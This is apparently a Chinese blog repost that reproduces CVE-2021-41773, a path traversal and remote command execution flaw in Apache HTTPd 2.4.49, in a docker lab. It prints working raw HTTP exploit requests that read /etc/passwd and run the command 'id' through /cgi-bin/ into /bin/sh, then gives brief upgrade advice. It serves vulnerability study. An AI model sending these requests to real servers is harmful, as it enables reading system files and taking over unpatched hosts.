zoukankan      html  css  js  c++  java
  • CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

    CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

    0x00 简介

    Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。

    0x01 漏洞概述

    2021年10月6日Apache HTTPd官方发布安全更新,披露了CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。在其2.4.49版本中,引入了一个路径穿越漏洞。在路径穿越目录允许被访问的的情况下,例如配置了 <Directory />Require all granted</Directory>,攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

    0x02 影响版本

    Apache HTTPd 2.4.49版本 且穿越的目录允许被访问。

    0x03 环境搭建

    git clone https://github.com/blasty/CVE-2021-41773

    cd CVE-2021-41773

    docker-compose build && docker-compose up -d

    docker ps 查看镜像所对应端口

     

    访问ip加8080端口出现如下界面即可

     

    0x04 漏洞复现

    任意文件读取:

    访问界面抓包

    直接打payloda即可

    Poc:

    GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

    Host: xxx.xxx.xxx.xxx:8080

    User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

    Accept-Encoding: gzip, deflate

    Connection: close

    Upgrade-Insecure-Requests: 1

    If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

    If-None-Match: "29cd-5ce49cca73d40-gzip"

    Cache-Control: max-age=0

     

    命令执行:

    访问界面抓包

    Poc:

    POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1

    Host: xxx.xxx.xxx.xxx:8080

    User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101  Chrome/175.28 OPR/220.59;

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

    Accept-Encoding: gzip, deflate

    Connection: close

    Upgrade-Insecure-Requests: 1

    If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT

    If-None-Match: "29cd-5ce49cca73d40-gzip"

    Cache-Control: max-age=0

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 7

    echo;id

     

    0x05 修复方式

    1、若低于 2.4.49版本,可不升级。

    2、若Apache HTTPd为 2.4.49版本,请尽快升级至最新版本。

    参考链接:

    https://mp.weixin.qq.com/s/-iZcn0M9a1uA64pkVB8Jkw

  • 相关阅读:
    UOJ #455 [UER #8]雪灾与外卖 (贪心、模拟费用流)
    Codeforces 482E ELCA (LCT)
    Codeforces 798D Mike and distribution (构造)
    AtCoder AGC017C Snuke and Spells
    HDU 6089 Rikka with Terrorist (线段树)
    HDU 6136 Death Podracing (堆)
    AtCoder AGC032D Rotation Sort (DP)
    jenkins+python+kubectl实现批量更新k8s镜像
    Linux 下载最新kubectl版本的命令:
    jenkins X 和k8s CI/CD
  • 原文地址:https://www.cnblogs.com/L0ading/p/15406894.html
Copyright © 2011-2022 走看看